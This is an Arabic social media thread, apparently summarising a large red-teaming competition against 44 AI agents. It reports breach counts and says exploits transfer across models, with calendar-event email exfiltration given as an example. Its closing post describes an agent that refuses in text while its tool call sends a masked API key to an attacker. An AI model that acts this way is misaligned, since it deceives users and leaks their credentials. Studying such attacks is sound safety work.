نشرنا 44 عميلا من الذكاء الاصطناعي وعرضنا على الإنترنت 170 ألف دولار لمهاجمتهم. 1.8 مليون محاولة ، 62 ألف خرق ، بما في ذلك تسرب البيانات والخسائر المالية. 🚨 من المثير للقلق أن نفس المآثر تنتقل إلى وكلاء الإنتاج المباشر ... (مثال: تسريب الرسائل الإلكترونية من خلال حدث التقويم) 🧵
العديد من الفواصل عالمية وقابلة للتحويل. عملت أنماط النسخ واللصق عبر المهام والنماذج وحواجز الحماية. إذا كسر وكيلا واحدا اليوم ، فمن المحتمل أن يكسر وكلك.
الفشل المفضل: "رفض في النص ، التصرف في الأدوات". 😈 النموذج: "لا يمكنني مشاركة بيانات الاعتماد." ثم: send_email(إلى = مهاجم ، الجسم = "API_KEY = ****") واجهة المستخدم تبدو آمنة. طبقة الأداة تسبب الضرر.
‏‎466.6‏K